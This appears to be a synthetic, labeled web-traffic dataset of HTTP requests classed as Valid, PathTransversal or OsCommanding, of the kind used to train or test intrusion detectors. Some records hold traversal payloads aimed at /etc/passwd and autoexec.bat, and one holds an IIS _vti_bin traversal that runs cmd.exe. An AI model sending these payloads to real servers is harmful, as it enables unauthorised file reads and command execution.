Accept-Language: dnvgh-n7cewa;q=0.3, o6uy-sogan
Cache-Control: no-store
Client-ip: 34.238.18.93
Cookie: 1ues4fewodgpx=uHtlofoxsr;RLsdha=r0et;6pyuctoilay=d)so
Cookie2: $Version="70"
Date: Thu, 24 Sep 09 12:48:46 CET
ETag: W/"O9kcnRqr.hXbx6V_il8"
Expect: ydtvhiN
From: leyen5sh@mOloiam5r.biz
If-Modified-Since: Mon, 21 May 07 18:31:47 CET
If-Unmodified-Since: Wed, 13 Jun 07 21:03:15 GMT
If-Match: *
If-None-Match: "Ucndbv_vfKhlIpNAphLM"
If-Range: Wed, 02 Sep 09 21:53:32 UTC
Max-Forwards: 20
MIME-Version: 9.7
Pragma: otv='doiza'
Proxy-Authorization: Digest opaque="puhep"
Authorization: ey5sgA ogyer0T0=aetoe
Range: 30889-130,957-,45-484050
Referer: http://sjnTbtt.de/oaeTeabh/Ohkej.doc
TE: deflate,trailers,trailers
Trailer: TE
User-Agent: Mozilla/6.4 (Windows; U; WinNT 7.2; om-ha; rv:6.9.0) Gecko/22096955
UA-Disp: 030,9561,32
UA-OS: Mac OS X
UA-Color: color16
Via: 3.2 171.201.248.242:982, zse/8.7 www.sxve.js, t5geal/4.9 www.O7crnge.html
Transfer-Encoding: 5retfe; iyicdta=mahetiw
Upgrade: stwept/3.7, 3caoys/9.9
Warning: 096 162.11.120.83 "m8Bjnanad" "Wed, 04 Mar 09 18:39:09 GMT"
X-Forwarded-For: 18.244.48.193
X-Serial-Number: 0088484140288112965
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

EZuadminD=169505&oenrf=$r&ep=45&Q8rPkAja=91&ddt6=pdnc

End - Id: 42712
Start - Id: 32964
class: Valid
POST /rgy/zjmqY0/wl/QwherextermpGPP5JzNI@I/oS6@oqW6tkSj-anQHkO/xIndAcmeemm.tiff? HTTP/1.1
Content-Length: 241
Content-Language: deYdenn
Content-Encoding: deflate
Content-Location: http://AcDs.fr/ozbl.php3
Content-MD5: c3luc3RuOGhuYmFubnRBdw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 04 May 10 10:01:34 CET
Last-Modified: Fri, 13 Jul 07 18:55:28 UTC
Host: www.Tbsqjeyh.ch
Connection: keep-alive
Accept: */*
Accept-Charset: us-ascii;q=0.8
Accept-Encoding: *;q=0.1
Accept-Language: tont-Htu;q=0.8, o-itrnw3;q=0.3, pnlAn0t4-net;q=0.6, er-atojChn
Cache-Control: no-store
Client-ip: 236.101.226.248
Cookie: p8aca=/j;addlx3tzOofp59w=tK6xgeAvdt;2snvcnanttl7=bvKZ6;balGhrh5r=2097;reao5DeasdgknlA=en4fhptaljeanLp;an4oynoo7j7=9274
Cookie2: $Version="212"
Date: Tue, 24 Jul 07 18:25:33 UTC
ETag: "b-J1ig-Ur0JjrIUNLzz"
Expect: rgnNuOh
From: eoiw@ba5rdx.uk
If-Modified-Since: Mon, 19 Mar 07 04:34:25 UTC
If-Unmodified-Since: Thu, 15 May 08 10:49:45 GMT
If-Match: "iHYRbWG-ESB6HqGe"
If-None-Match: *
If-Range: *
Max-Forwards: 2625
MIME-Version: 9.1
Pragma: asie='ts0'
Proxy-Authorization: Basic aXNTNzlyOnR0eHVl
Authorization: Digest nonce
Range: -67900,74-11848
Referer: /dlohf/aamip.fgf
TE: chunked
Trailer: Pragma
User-Agent: atir0vdta/4.8.9.6
UA-CPU: StrongARM
UA-Disp: 8787,462,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 532x605
Via: FTP/1.7 www.fIfeuZSw.jpeg, HTTP/5.8 106.239.87.225, 4.8 www.c6n7n1a.jpg
Transfer-Encoding: gzip
Upgrade: eg7oe/1.7, Get5/4.2, ssawt/2.5
Warning: 432 175.168.172.127 "tr8n3rmtlSfh" 
X-Forwarded-For: 127.73.141.150
X-Serial-Number: 62410
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

ea0e=i&2foons=i53tlbf6cb&cm=aFZtI68&hE81hst0aWnDoh=yevcelwI6inlg&_yRjx8=7090&ee7edele=umaad&4u0E59qY=tamOi&ibu=8dlp&itrhtgh3jot65=eS &BjezTeeuoZeDead=pblfte5&ordsemhoo8eiitR=eamboe&s5UR@fscriptv=74&honkrdkkOodrNua=iYDhj6jLlgH&2LXz8rWnxQ2=830

End - Id: 32964
Start - Id: 44976
class: PathTransversal
GET /haple7Adous55a/lmbioedrwzgsh/Zhome1cTBN/sespahvalWmlyje/btkjnlat3yun.css?n4tatohe=.%2F..%2F..%2F..%2F..%2F..%2F HTTP/1.0
Host: www.ETnFfv7.uk
Connection: dtcn
Accept: */*;q=0.4
Accept-Charset: cp-936;q=0.4, iso-8859-1, x-mac-chinesesimp
Accept-Encoding: *;q=0.1
Accept-Language: 9o-e2owete, e-eedctel, znos-ptNeoae, ilmepe5e-al, xolNheha-aigni
Cache-Control: min-fresh=367
Client-ip: 81.141.204.248
Cookie: faaxnoe=071977;Rrs=110580;sel=11714
Cookie2: $Version="2"
Date: Mon, 09 Apr 07 17:18:34 GMT
ETag: "cQYNQi481EW5_Y7"
Expect: wpte
From: tsdma@neiban.be
If-Modified-Since: Sat, 27 Dec 08 21:00:23 UTC
If-Unmodified-Since: Mon, 25 Oct 04 06:00:42 UTC
If-Match: "1PKjliFUbeDC_p5py5c"
If-None-Match: *
If-Range: Thu, 08 Sep 05 12:13:08 UTC
Max-Forwards: 1837
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM aW1ucm95dEUwb2VzdGZzY2RjaDhsbEJuZXRoaHlpdG1rZVZkeA==
Authorization: Digest uri=http://fhsnecM.biz/mt7r27b/cseb/teert4/aesed/wdRhTn.jsp
Range: -972278
Referer: /oer1d/nsaeolio.gz
TE: trailers
Trailer: If-Range
User-Agent: islie7n8/9.4.9
UA-CPU: Sparc
UA-Disp: 272,747,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: FTP/2.0 www.nceaelo.js, 0.8 200.97.68.253, lhfhes/3.3 252.77.246.216
Transfer-Encoding: deflate
Upgrade: tOgk/7.2, 57lv/3.4, zpxc/7.9
Warning: 066 www.nilrhde.jpg "jrIghnmascnrodusoxo" "Thu, 06 Oct 05 03:19:48 UTC"
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 88070194263
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44976
Start - Id: 44283
class: OsCommanding
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.siefeel.ch
Connection: bebp
Accept: video/*;q=0.8, video/*
Accept-Charset: utf-7, iso-2022-jp;q=0.4, iso-8859-6;q=0.0, windows-1253
Accept-Encoding: *;q=0.5
Accept-Language: bai-oreyey;q=0.2, nadsvn-2, atreha-gritapT, ei9-n;q=0.1, hswm2eth-Sthitr5;q=0.4
Cache-Control: max-age=3
Client-ip: 192.246.21.91
Cookie: ngt4gJyeihrbno=71108;imetma=3e?mEtnme
Cookie2: $Version="75"
Date: Tue, 03 Feb 09 14:04:39 GMT
ETag: "lRY.im-Vf8FuriFi"
Expect: 100-continue
From: aEtkm@tNLeshe.uk
If-Modified-Since: Thu, 18 Nov 04 19:40:33 UTC
If-Unmodified-Since: Tue, 16 Sep 08 18:31:07 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 08 Nov 04 16:50:31 UTC
Max-Forwards: 6421
MIME-Version: 6.9
Pragma: oercr=cko5
Proxy-Authorization: vahee otnsenso=4Odndyfc
Authorization: neffn eeOytygd=mgot
Range: 639-682,28229-
Referer: /lce4eo/ydfeSwvh.jpeg
TE: chunked;q=0.8,trailers
Trailer: Via
User-Agent: Mozilla/2.7 (X11; U; Solaris 1.3; vt-ad; rv:5.4.7) Gecko/68197003
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 902x0631
Via: uhepu/7.2 231.109.39.77, FTP/3.5 www.air3ytT.tiff, 8pe/4.8 1.44.241.238
Transfer-Encoding: gzip
Upgrade: coeeIl/9.2, natae/9.1, hi4/9.9, 3tu3nt/4.6, epa5c/2.6
Warning: 674 28.181.161.239 "fsbetechtt6msa4eu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 76527711
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44283
Start - Id: 45376
class: PathTransversal
PUT /eorckenu1edezpegt/tk/dnaeoEOaa/yrMXh@Np8rVWfXs/o2pKcmpDjmwrZ_F7LGK/zZIEerwQ7/EFtlmi9jtsrfGaeamrs/mtrtrvewwyvtfld/arbemgoeocniziy/rzfTlAh/31aTs0slwbopeeEsptlu.js? HTTP/1.1
Content-Length: 122
Content-Language: 1sii9o,ur,gd
Content-Encoding: deflate
Content-Location: http://nt34Tg.be/rmmnos/jisq.avi
Content-MD5: QXNzMDFFcWF4bTRvZXNuOA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 06 Oct 08 22:58:39 UTC
Last-Modified: Mon, 08 May 06 13:26:31 GMT
Host: www.nehnSa4z.uk:80
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: iso-8859-8-i;q=0.9
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: hieitn='ygbiwil'
Client-ip: 219.120.83.225
Cookie: cehjohyhOooh=7;Bha=eb9Q;diEn=928;rKGjoh=oepositionc;kork8Negoh0l=$ztl
Cookie2: $Version="96"
Date: Sat, 11 Feb 06 10:22:35 UTC
ETag: "BVmpJ8txQ8q.HBmdrzQB"
Expect: 100-continue
From: R3loelSr@cnorhewh.st
If-Modified-Since: Fri, 08 Feb 08 19:25:10 CET
If-Unmodified-Since: Thu, 19 Jun 08 02:02:44 CET
If-Match: "8bl_RjSClDPqSdpag"
If-None-Match: "_6KX@XpcxoIZJoajb"
If-Range: Sun, 19 Sep 04 02:46:35 UTC
Max-Forwards: 81
MIME-Version: 2.6
Pragma: eel='sy'
Proxy-Authorization: NTLM cGVsYW9ldGxJMjRyb21pc2lpYXhpbWxyZG5lZHVsc2VpN2FlSGM=
Authorization: Basic bmZiZXl6ZWw6clJoZ3JyZw==
Range: 0524-
Referer: /mmtop/elTiN/eSnBr9/nrvhpTa.tar.gz
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/1.2 (Windows; U; Windows NT 0.5; sa-Oh; rv:3.3.8) Gecko/76834475
UA-CPU: Sparc
UA-Disp: 9353,7001,16
UA-Color: color8
UA-Pixels: 0455x0884
Via: 1.0 40.146.129.164, FTP/3.4 3.243.189.169, ooe/1.3 33.111.197.167:3324
Transfer-Encoding: identity
Upgrade: y6otbe/1.0, A4me31/2.9, Aloea/2.4
Warning: 851 99.105.244.225 "ewewAqyftpmnve" 
X-Forwarded-For: 42.158.87.228
X-Serial-Number: 37550564020499
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

euea=oaconnecta@Hnx&tsqweo=d4e0SCI-b7l&teoresbe=../../../WINNT/autoexec.bat&sghaenns=|/e&r7esnt31i=mnk11AxNe

End - Id: 45376
Start - Id: 23157
class: Valid
GET /ioym98jphNGsPSwopnB/lymFhaeouftoamsqCt0h/naNj8v0/2l3IpzBjuc@bUAe@NJRO/nrn7sdhOte7tsz/dBNneldasntst/ABL7p.gif?lhawe3snjmiier=l-+Ologheor%3Er&waw6enlown=n%40a2&8jceh=u3d&Sofil=cevar&rortzr=es%40pBnvPb HTTP/1.0
Host: www.hyenecd.cz:80
Connection: keep-alive
Accept: audio/x-wav;q=0.5
Accept-Charset: x-mac-icelandic;q=0.3, windows-874;q=0.4, koi8
Accept-Encoding: gzip;q=0.5
Accept-Language: cwdaEtrn-ue5r8Rn
Cache-Control: min-fresh=216
Client-ip: 79.171.6.226
Cookie: lvuiamaa2fdo=1uupdateidphp;tci=3394195687;aWhq=mocha>
Cookie2: $Version="573"
Date: Tue, 03 Jun 08 22:58:48 GMT
ETag: W/"DoQ3O1.-wYoAiKs"
Expect: srvh=dslq;Lte6owo
From: aadN@latousamhh.uk
If-Modified-Since: Tue, 11 Jan 05 11:53:21 CET
If-Unmodified-Since: Tue, 13 May 08 08:47:26 CET
If-Match: "iRPRdeK2bQp.uB0upk9"
If-None-Match: "rIKFrQwl4buHLTco"
If-Range: "zHGLPs.ydmSh5d4W"
Max-Forwards: 1
MIME-Version: 4.4
Pragma: Ehnnf='seds'
Proxy-Authorization: ariihf uAaec=elRxHnr
Authorization: Digest realm
Range: -362684,26-
Referer: /4efsjlch/iclti/acdh6uta/hstt.png
TE: trailers,deflate,gzip;q=0.2
Trailer: If-Unmodified-Since
User-Agent: cpLv/6.5.2
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 293x103
Via: 4.1 198.213.182.134, FTP/9.8 33.241.8.88
Transfer-Encoding: gzip
Upgrade: aeo6t/4.4, matg/8.3, 0dn/5.9, uoO/0.4
Warning: 171 239.232.210.6 "br0iasmbtlifzqoe" 
X-Forwarded-For: 179.20.58.194
X-Serial-Number: 64536602678129
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23157
Start - Id: 24117
class: Valid
GET /nsdtE/tzN4zXDQT3/4UCEXb-UoD/uqZU.yGg9C_/e2/iSiue7wa/ti7nncluwzeic4rs/d5BCIegTJ/qehR4io6vEq/Nxpp0GIPmBVT/sJk.dgxa@fZ/lhkX.png?VDabRsa=relb%29 HTTP/1.1
Host: 252.181.3.234
Connection: nzire
Accept: text/plain;q=0.9, video/*;q=0.2, video/*;q=0.5
Accept-Charset: ks_c_5601-1987, euc-jp;q=0.9, x-mac-ce;q=0.3
Accept-Encoding: *;q=0.0
Accept-Language: qMxdpI-isl5o0;q=0.8, iw-Ihaiam3g;q=0.9
Cache-Control: no-store
Client-ip: 17.13.132.139
Cookie: elrrt=eedDenfxhoe2Hstdinh;oaLBhLuS=W;nksattlvew3ct=bnrNNkWt;nHx=23;ixesltatNni7y=le5=ofVezi2z2meta
Cookie2: $Version="9"
Date: Fri, 07 Jul 06 15:25:43 CET
ETag: W/"csn8IelteXHYnWTqdNm"
Expect: oavt=eThntlo2
From: teocayH@bcantyn.net
If-Modified-Since: Tue, 12 May 09 13:33:33 UTC
If-Unmodified-Since: Tue, 22 Apr 08 16:48:45 CET
If-Match: *
If-None-Match: "uQA_x5aPH3a71gOf"
If-Range: *
Max-Forwards: 98
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: -293,9-
Referer: http://e3veh.com/esa1pArA/taAQ0trz/vwe62te/ty8wpe.zip
TE: trailers
Trailer: If-None-Match
User-Agent: eoemH/7.7
UA-CPU: StrongARM
UA-Disp: 3355,078,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 109x7677
Via: 2.5 www.Ddglel.css, HTTP/3.0 29.52.174.4
Transfer-Encoding: nawrso; Q2eEaon=t3iruy
Upgrade: hlnn4/1.8
Warning: 382 www.ni2t.htm "ztadtttA6sydiidea" "Fri, 07 Jan 05 08:48:11 CET"
X-Forwarded-For: 33.216.101.183
X-Serial-Number: 98139157905
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24117
Start - Id: 46460
class: PathTransversal
POST /scjix.evZWNr8OSX/lswNJins3aUQJVQci1/_XvRXI5bmbrxtermcT.css? HTTP/1.0
Content-Length: 108
Content-Language: nnemadou
Content-Encoding: identity
Content-Location: http://www.any9teed.be/wnmili/Nhdynl/tssmaei/ew431r01.exe
Content-MD5: bUV5dGJvVGY2ZWxmdHJybA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 28 Feb 06 19:11:53 CET
Last-Modified: Sun, 02 Jan 05 10:34:30 CET
Host: 103.147.135.223
Connection: eochciom
Accept: */*;q=0.8
Accept-Charset: euc-cn, x-mac-hebrew, windows-1255, windows-1251;q=0.3
Accept-Encoding: 
Accept-Language: lst5-mo, lt-8ll, naawio-eaase, stertn-n36Ler;q=0.4, zxtejO-7qn6n
Cache-Control: no-store
Client-ip: 139.246.100.46
Cookie: ylfcio=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html;n8=( h%ac;E9yheo=eewt
Cookie2: $Version="89"
Date: Mon, 20 Aug 07 18:50:12 GMT
ETag: W/"TJ6lzT4_TE_QfhWrJ"
Expect: 100-continue
If-Modified-Since: Sun, 21 Oct 07 05:41:05 GMT
If-Unmodified-Since: Wed, 23 Apr 08 04:42:34 GMT
If-Match: "g2wEXHuTk59mSk7"
If-None-Match: *
If-Range: "y2eIiY@ZtqtH9mB"
Max-Forwards: 86
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic YTloeWFmOnU0a3JpZWRl
Authorization: NTLM b29taEhwYWE5eHR0Nm9kNnViaXluYjBkTWRsbGl1c2lpMG5uaGRjc1Vl
Range: 603-,-0,1-
Referer: /s2lent/0fae2.exe
TE: trailers
User-Agent: erate6zsfang3dtrort
UA-CPU: 68000
UA-Color: color8
UA-Pixels: 6374x8112
Via: 7Em/3.3 www.Rurboa1q.jpg, 5.0 www.lie6.jpg, 7.6 238.56.132.217
Transfer-Encoding: Y8T1fr; 0tabeaic=myohoutt
Upgrade: ae7Tnm/0.6, ddn/6.0, uaf/8.1, ahn2ea/6.5, enin4/3.9
Warning: 658 www.mKEi.js "tsOaeeMszh" 
X-Forwarded-For: 126.205.131.207
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

AiaIaqc8arui5i=jBA6p4&hrjEdhoonnsn=tnZ&udlaAedtmjm= access_logqHphpeie&5Ht8cs=470&t2aswg1=access_logpasEBrcr

End - Id: 46460
Start - Id: 3538
class: Valid
GET /sQtX4-3FYenl/5jVZMYBQwFm2pAw.nsf?22x=8674559328&heNlto=eicuopfaretsnxeo5a HTTP/1.1
Host: 190.143.222.47
Connection: ispauu
Accept: application/*;q=0.2, text/*;q=0.7, image/*;q=0.7
Accept-Charset: x-mac-arabic;q=0.2, windows-1258, x-mac-chinesetrad;q=0.5, iso-8859-2;q=0.2, ks_c_5601-1987;q=0.6
Accept-Encoding: *
Accept-Language: c-i;q=0.0, a-ohwte;q=0.5, ho6sohzI-vxOdn, otnsvste-Dc;q=0.5
Cache-Control: no-store
Client-ip: 222.249.123.200
Cookie: a1dt5koorrtleiS=m=ro;hDyc6brrAZtnnn=auD-u@Tkd8;anno9ptsz=s s;3mochar@poxexec=og<H[eacceptiH+h2th;eenAttc4tnnuDmt=9361214
Cookie2: $Version="844"
Date: Thu, 04 Dec 08 10:36:19 UTC
ETag: W/"GzK3OIJX9n_w7S0ueg"
Expect: 100-continue
From: en6o@GjeessSofa.org
If-Modified-Since: Sun, 17 Oct 04 19:07:22 UTC
If-Unmodified-Since: Fri, 26 Sep 08 01:06:53 UTC
If-Match: "3qzzx_P5rbYzfflVQId"
If-None-Match: "NamU6d-YpXtc@Vo"
If-Range: Sat, 10 Jun 06 16:57:16 GMT
Max-Forwards: 7
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM MG1leGhuZW45OHRjOHlyT250ZXVHbGRtdGlpb2VjOWFzZGF0Y28=
Authorization: Basic dWlUZDpvUlVnZWE=
Range: 0-91,8335-51366
Referer: http://teDpp.st/deeh/olis/soIYmuar.jpg
TE: deflate;q=0.1,trailers
Trailer: Date
User-Agent: Mozilla/9.0 (compatible; Konqueror/8.4; SunOS sun4u; wTneniut; 6iiae)
UA-CPU: MIPS
UA-Disp: 782,802,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5560x152
Via: FTP/4.3 217.45.8.110, FTP/5.3 www.aNlStnDN.css
Transfer-Encoding: identity
Upgrade: Srow/2.6, isahhr/6.2, ia9mfs/8.5, oogod/5.3, n6Lyi/6.7
Warning: 996 www.oioeoa.png "henuSrMevtewo9Rnoa2h" "Sun, 29 Nov 09 11:37:16 CET"
X-Forwarded-For: 233.242.107.236
X-Serial-Number: 08087704716417
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3538
Start - Id: 12091
class: Valid
GET /5LselectYLA4zpihttp/Eayexiawocdr6ee/thtrteFtjmyre/0bnaaonhbwE5/zhoihetcitotrn7vtei/up9Yqgng6TJMa0Yb/a9ostTeo1ctgcelr.htm?haabtxcm=+0jND9od%2Fjkfe&rdmtrrms=a19oiiopassthrui%2Bvbscript&omldaimmAy0=ant&imltuqiewnun=eb%40uTx&pnyez4=l9sabsUtuD6sc4ehi&aEie=+jnnode&OXGG0qUPB=%2Bsheiframe0hIlm%26fo&hralkrEne=MredonW&eoan=3713&RQlqp=hnos+ HTTP/1.0
Host: 42.29.173.122
Connection: close
Accept: */*
Accept-Charset: x-mac-roman
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 229.43.6.180
Cookie: eE2scriptFNGiSD4=ui0Dmn;jiiem7s=eittoer
Cookie2: $Version="438"
Date: Tue, 19 Oct 04 01:22:47 UTC
ETag: W/"ykRWpgCszwkMMqM1Fb"
Expect: onaNtti6=wymieb
From: uo62eumo@wietooDoc.it
If-Modified-Since: Tue, 21 Oct 08 15:23:53 CET
If-Unmodified-Since: Tue, 20 Jul 04 19:01:16 UTC
If-Match: "vaDEl@8trtECnW_EBNL"
If-None-Match: *
If-Range: Tue, 23 Feb 10 24:25:28 UTC
Max-Forwards: 5
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM cXlncnZpOW9qcmppYTlvdHFvODZiM2Rpcmx5dXR5bWVvbGFndDhhZThybDd2
Authorization: NTLM dGZBMnNlcmhvZWhqZHBzcGpkY2VhYW5xZXlodXVlY205cnR1ZWV6YmV2bnNiZWM=
Range: -59437
Referer: /g8tlubi.jsp
TE: trailers,trailers,deflate
Trailer: Trailer
User-Agent: Mozilla/5.6 (compatible; MSIE 3.9; Unix; bjqdda1ea; hRtm; jrhoae)
UA-CPU: Sparc
UA-Disp: 750,6227,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 802x8230
Via: HTTP/1.3 184.190.252.206:0754
Transfer-Encoding: deflate
Upgrade: agae/3.5, l79so8/7.9, aG6/1.3
Warning: 364 www.rnndhhu.html "lNiB7of9mccT8t4" 
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 739755
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12091
Start - Id: 4336
class: Valid
POST /htVsh/oUhega4SwoiAr5/.RNMoNm/jD@lk5S/tAnIfb6/atr/xp_WAiVwgetZlWh/oz7pzpK0C/0pLn/0p/eo.jpeg? HTTP/1.0
Content-Length: 79
Content-Language: eusgei,bsl0teoi
Content-Encoding: compress
Content-Location: /4s6ipcwt/Eneian/Enthas/h5al.gz
Content-MD5: c2xlZWRldTVsZXJ1czd4bw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Apr 09 05:59:42 GMT
Last-Modified: Sat, 16 Oct 04 17:14:16 CET
Host: www.4eP5i.ch
Connection: keep-alive
Accept: text/plain, application/*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 67.250.58.132
Cookie: Zw3iconnectPPuItf9=141;4obhne=5378
Cookie2: $Version="10"
Date: Mon, 28 Jan 08 07:04:38 UTC
ETag: W/"GXGK-.REYw4zTvKw"
Expect: 100-continue
From: 5soaa@eElhadti.fr
If-Modified-Since: Sat, 27 Nov 04 07:17:53 UTC
If-Unmodified-Since: Wed, 15 Mar 06 08:56:56 CET
If-Match: "NNyXPQZ3kk7Ktm4j3"
If-None-Match: *
If-Range: "yKYqoM0ALUZ1A9X"
Max-Forwards: 22
MIME-Version: 1.0
Pragma: skrdetat=ci5o
Proxy-Authorization: Digest nonce
Authorization: NTLM Q1RvcDZzYW9ucWJkZWduaGVheXRjZldldHN1Z2VmYXRvaWVlaQ==
Range: 45370-03,2-266951,-79688
Referer: http://naln.cz/waeeer/sdswirRb/an6iin.shtml
TE: deflate
Trailer: Trailer
User-Agent: a99-MLFB http://www.rnrio.cz
UA-CPU: x86
UA-Disp: 564,954,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8501x1867
Via: tra/1.5 141.162.17.48
Transfer-Encoding: deflate
Upgrade: esgn/6.8, ei1l/5.1, redat/5.0, 10g/8.4
Warning: 980 www.Rrmnetut.css:6 "sOlpsziur" "Wed, 25 Mar 09 01:43:09 GMT"
X-Forwarded-For: 184.207.120.162
X-Serial-Number: 558161197485765584
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

esrnpe=yn9acE&a9iwcreppr0Sc=gsbkx&Hpkmaec=aWOo&2OWastylerOzdeletev8=lshutdowne 

End - Id: 4336
Start - Id: 7378
class: Valid
PUT /eydThU92-glHma6i/eNg2@FDhpads/rCELQXeHTbG@to1Vdtk/aC8uecnthn17rei/npi64/zhw_BAoformhomeH1t/end/5-c1PosX/m8j2/a0qOMA8rNBMtmAr3BCrX/xGZ30JtSFxtbinwp-f.png? HTTP/1.0
Content-Length: 208
Content-Language: tbh,te,9tesiy
Content-Encoding: compress
Content-Location: http://dt0eeer.fr/nev69bee/ibLgst1o.jpg
Content-MD5: bmFvc2JmZWlmZWJOZW5hdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 16 May 04 20:20:56 GMT
Last-Modified: Sun, 15 Jan 06 13:53:51 GMT
Host: 255.169.121.202
Connection: keep-alive
Accept: video/mpeg;q=0.5, image/jpeg;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: S8iH-bnotig, 8ltpqm-ft1y0es, i-t
Cache-Control: ea='q'
Client-ip: 139.170.250.122
Cookie: os=d3thaAsctotee0t;foes1sqt1aIres=818974406;09dr9fhmyvt3oln=2
Cookie2: $Version="8"
Date: Tue, 10 Jul 07 16:40:59 GMT
ETag: W/"h0Ub3tGUQhgHBSBo5X"
Expect: 100-continue
From: coe5re@9jhe.fr
If-Modified-Since: Tue, 23 Oct 07 18:45:16 UTC
If-Unmodified-Since: Thu, 16 Feb 06 09:31:25 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 5.7
Pragma: ibno='ttneoa'
Proxy-Authorization: NTLM dGoyc3RobnNpSTdjbUVlYXVoZW1lM3RhbW8wT21vdFJJbjZldnJjMDdEZWdhSW9z
Authorization: NTLM ZXR0Z2V1YjZ0YXN0YWZyaGxIcG1FZHRub2lmMnRUSTFwcWFlc3VjcQ==
Range: 253426-5
Referer: /5b0kn/bo5s/anw0Nou/ty3ist/sAveoho.gif
TE: deflate
Trailer: Expect
User-Agent: Mozilla/9.9 (Windows; U; Windows NT 5.5; dr-sw; rv:1.3.0) Gecko/57835552
UA-CPU: StrongARM
UA-Disp: 621,301,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 850x401
Via: HTTP/6.9 www.eyrss.jpg:38388, 0.0 107.207.2.242
Transfer-Encoding: compress
Upgrade: Tcl/1.4, hde/4.4, fe2s6/8.8, prra/7.3, ta2/1.0
Warning: 129 www.b5xcg9r.htm:36876 "FiaNtata6i" "Sat, 06 Feb 10 04:16:05 UTC"
X-Forwarded-For: 114.0.180.179
X-Serial-Number: 33978029627174385263
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

ckrsAmtf4dultn=6itt&SmohhdfuwglnAT=erkdnstmeh6pc&Snsinp9sjnlnei=@&phll2faUtTbqilN=meta ee&t8=)Twp-Nt&6iIriah=78538&iqsontiaev=2860&c63beehinfHg=35&V9e=3eheiy&op0qa0oQ=wnN2o3&1ej4e=egAe&8rf3l7s=hgo1f 0nSrr

End - Id: 7378
Start - Id: 243
class: Valid
GET /tt/iC4.BuG2_d/EotimrSconuhdotsta/mrao7esac62/oaVgtoo-U-P9/dnhtlasysNesshl.php3?bwWuotO6roent=18760&e2aea19A5hn=83629&aemiLoo=rebhNd7&ieCirerep=nenn9Pcmeio1hts HTTP/1.0
Host: www.rEePd4psnA.biz
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-cache
Client-ip: 69.214.106.13
Cookie: ioei9=iee;geigaOhpee=ish
Cookie2: $Version="87"
Date: Sat, 07 Jun 08 19:24:51 CET
ETag: W/"o-gjpjfrrHp3qFe"
Expect: Teme
From: yeXhbouc@7trpphie.it
If-Modified-Since: Sat, 17 Jul 04 22:55:33 GMT
If-Unmodified-Since: Thu, 12 Apr 07 02:08:27 CET
If-Match: "bGlcZM52JGu7VBg.Z4Yi"
If-None-Match: *
If-Range: Fri, 27 May 05 02:06:09 CET
Max-Forwards: 7
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Basic dnNzYXltZDp3aHV4MGJndA==
Authorization: NTLM bnR1b21sM3NhOXJjdGJhRTJ5ZEd3am9pa3JzbHRhYW9lcGU=
Range: 99303-6
Referer: /AOons/rnlw8erb/tlniEi/jims/alonbi.exe
TE: gzip;q=0.2,deflate,chunked
Trailer: Cache-Control
User-Agent: 0P35bjbE5b http://www.osHbuosr.gov
UA-CPU: StrongARM
UA-Disp: 887,741,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4622x2387
Via: HTTP/9.7 16.206.66.8
